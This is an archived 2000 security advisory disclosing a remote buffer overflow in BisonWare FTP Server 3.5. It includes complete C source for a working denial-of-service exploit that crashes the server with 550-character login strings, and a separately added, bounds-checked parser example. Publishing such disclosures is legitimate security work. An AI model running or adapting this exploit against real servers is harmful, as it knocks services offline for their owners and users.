Roses Labs BisonWare FTP Advisory

From: Conde Vampiro (condeat_private)
Date: Sun Mar 05 2000 - 20:17:04 PST

    "BisonWare is an FTP server that runs on the Windows platform. An intruder can
    crash the FTP server remotely without needing to log in; even with no
    legitimate account on the system it is still possible to attack the FTP
    server."
    
    Conde Vampiro
    Roses Labs / w00w00
    http://www.roses-labs.com
    Advanced Security Research.
    
    
    
    		Roses Labs Security Advisory
                    ----------------------------
    
      Author: Conde Vampiro
      Roses Labs Advisory Code: RLA002
      Date: 2/29/2000.
      Software: BisonWare FTP Server V3.5
      Platform: Windows 9x/NT.
      Risk: Remote buffer overflow that allows
      crashing the FTP Server. (It may also be
      possible to execute arbitrary code.)
    
      ------------
      Introduction
      ------------
    
    	Bison FTP Server is an FTP server that
      runs on Windows platforms. An intruder can launch
      an attack that will crash the FTP server.
    
      ------
      Detail
      ------
    
    	Sending a "LOGIN" and "PASSWORD" of 550 characters
      each will crash the FTP Server. This is the error that
      the FTP server produces:
    
      "Exception EAccessViolation in module BISONFTP.EXE at
       0A0D4858. Access vilation at address 0A0D5858. Read of
       address 0A0D5858."
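
      The access violation above is what an unbounded copy of the login
      argument into a fixed buffer looks like from the outside. The following
      bounds-checked FTP command parser is an added example written for this
      page, not code from the advisory or from BisonWare; the 64-byte
      FTP_ARG_MAX limit and the function names are assumptions.

```c
#include <string.h>
#include <ctype.h>
#define FTP_ARG_MAX 64   /* assumed limit; no USER/PASS argument needs more */

struct ftp_cmd {
    char verb[5];               /* FTP verbs are at most four letters */
    char arg[FTP_ARG_MAX + 1];
    size_t arg_len;             /* argument length as received on the wire */
};
/* Parse one FTP command line into a fixed-size struct: 0 on success, -1 for a
 * malformed verb, -2 when the argument exceeds FTP_ARG_MAX. The overlong case
 * is rejected before any copy, the check the crash above shows was missing. */
int parse_ftp_line(const char *line, struct ftp_cmd *out)
{
    size_t n = strcspn(line, "\r\n");   /* length without the line terminator */
    size_t v = 0;
    memset(out, 0, sizeof *out);
    while (v < n && v < 4 && isalpha((unsigned char)line[v])) {
        out->verb[v] = (char)toupper((unsigned char)line[v]);
        v++;
    }
    if (v == 0 || (v < n && line[v] != ' '))
        return -1;                      /* no verb, or verb not followed by a space */
    if (v < n) v++;                     /* skip the separating space */
    out->arg_len = n - v;
    if (out->arg_len > FTP_ARG_MAX)
        return -2;                      /* refuse instead of overflowing out->arg */
    memcpy(out->arg, line + v, out->arg_len);
    out->arg[out->arg_len] = '\0';
    return 0;
}
/* Constructed input: the 550-character USER line from the advisory. */
int check_overlong_login(void)
{
    char line[5 + 550 + 2];
    struct ftp_cmd cmd;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'X', 550);
    line[555] = '\n'; line[556] = '\0';
    return parse_ftp_line(line, &cmd);  /* -2: rejected, nothing overflowed */
}
/* Constructed input: an ordinary login; returns 1 if parsed as expected. */
int check_normal_login(void)
{
    struct ftp_cmd cmd;
    if (parse_ftp_line("user anonymous\r\n", &cmd) != 0)
        return 0;
    return strcmp(cmd.verb, "USER") == 0 &&
           strcmp(cmd.arg, "anonymous") == 0 && cmd.arg_len == 9;
}
```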
    
      ----
      Code
      ----
    
    	Warning: Neither Roses Labs nor the author accepts
      any responsibility for the use of this code. This code will
      crash the FTP server.
    
    ------- CODE START -------
    
    /*
     * FILE: rlxbison.c
     * CODER: Conde Vampiro.
     * DATE: 2/29/2000.
     * ABSTRACT: Remote DoS of BISON FTP Server 3.5
     *
     * Compile: gcc rlxbison.c -o rlbison
     *
     * Roses Labs / w00w00
     * http://www.roses-labs.com
     * Advanced Security Research.
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    
    /* Defines */
    
    #define MAX 551          /* 550 filler characters plus the terminating NUL */
    #define MAXDATA 1024
    
    /* Global variables */
    
    int sock;
    int i;
    char datacrap[MAX];
    char *temp;
    char tempdata[MAXDATA];
    char buf[MAXDATA];
    struct hostent *host;
    struct sockaddr_in KillFTP;
    
    /* Prototypes */
    
    unsigned long resolve(char *host_name);
    char *crap(int num);
    
    /* Main */
    
    int main(int argc, char *argv[]) {
    
            if(argc < 2) {
                    printf("Usage: %s <Host>\n", argv[0]);
                    exit(-1);
            }
            KillFTP.sin_family=AF_INET;
            KillFTP.sin_addr.s_addr=resolve(argv[1]);
            if(!KillFTP.sin_addr.s_addr) {
                    printf("Host Unknown: %s\n",argv[1]);
                    exit(-1);
            }
            KillFTP.sin_port=htons(21);
            sock=socket(AF_INET, SOCK_STREAM, 0);
            if(sock < 0) {
                    printf("Error creating socket!!\n");
                    exit(-1);
            }
            if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) {
                    printf("Roses Labs Bison FTP Xploit\n");
                    printf("Remote crashing code!!!\n");
                    /* Read the server banner before sending the commands */
                    recv(sock,tempdata,sizeof(tempdata),0);
                    sleep(1);
                    recv(sock,tempdata,sizeof(tempdata),0);
                    /* 550 'X' characters, NUL-terminated inside datacrap[MAX] */
                    temp=crap(MAX - 1);
                    sprintf(buf,"LOGIN %s\n",temp);
                    send(sock,buf,strlen(buf),0);
                    sprintf(buf,"PASS %s\n",temp);
                    send(sock,buf,strlen(buf),0);
                    printf("Host %s crashed!!\n",argv[1]);
                    exit(0);
            } else {
                    printf("Couldn't connect to %s on port 21,\n", argv[1]);
                    exit(-1);
            }
            if(close(sock)) {
                    printf("Error closing socket!!\n");
                    exit(-1);
            }
    return(0);
    }
    
    /* Functions */
    
    /* Resolve a dotted-quad or host name to a network-order IPv4 address;
       returns 0 when the name cannot be resolved. */
    unsigned long resolve(char *host_name) {
            struct in_addr addr;
            struct hostent *host_nam;
    
            if((addr.s_addr = inet_addr(host_name)) == INADDR_NONE) {
            if(!(host_nam = gethostbyname(host_name))) return(0);
            memcpy((char *) &addr.s_addr, host_nam->h_addr, host_nam->h_length);
            }
            return(addr.s_addr);
    }
    
    /* Fill datacrap with num 'X' characters and NUL-terminate it
       (num must be at most MAX - 1). */
    char *crap(int num) {
            for(i=0;i<num;i++) {
                    datacrap[i]='X';
            }
            datacrap[num]='\0';
            return(datacrap);
    }
    
    /* w00w00 E0F */
    
    ------- CODE END -------
    
      ---
      Fix
      ---
    
    	This problem is fixed in V4.1, which is out soon.
    
      ----
      Note
      ----
    
    	This bug was found using Cyber Host
      Auditor (CHA). CHA is a security tool coded by
      Roses Labs to discover DoS conditions and
      possible buffer overflows in an easy way.
    
      Roses Labs / w00w00
      http://www.roses-labs.com
      Advanced Security Research.
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:39:00 PDT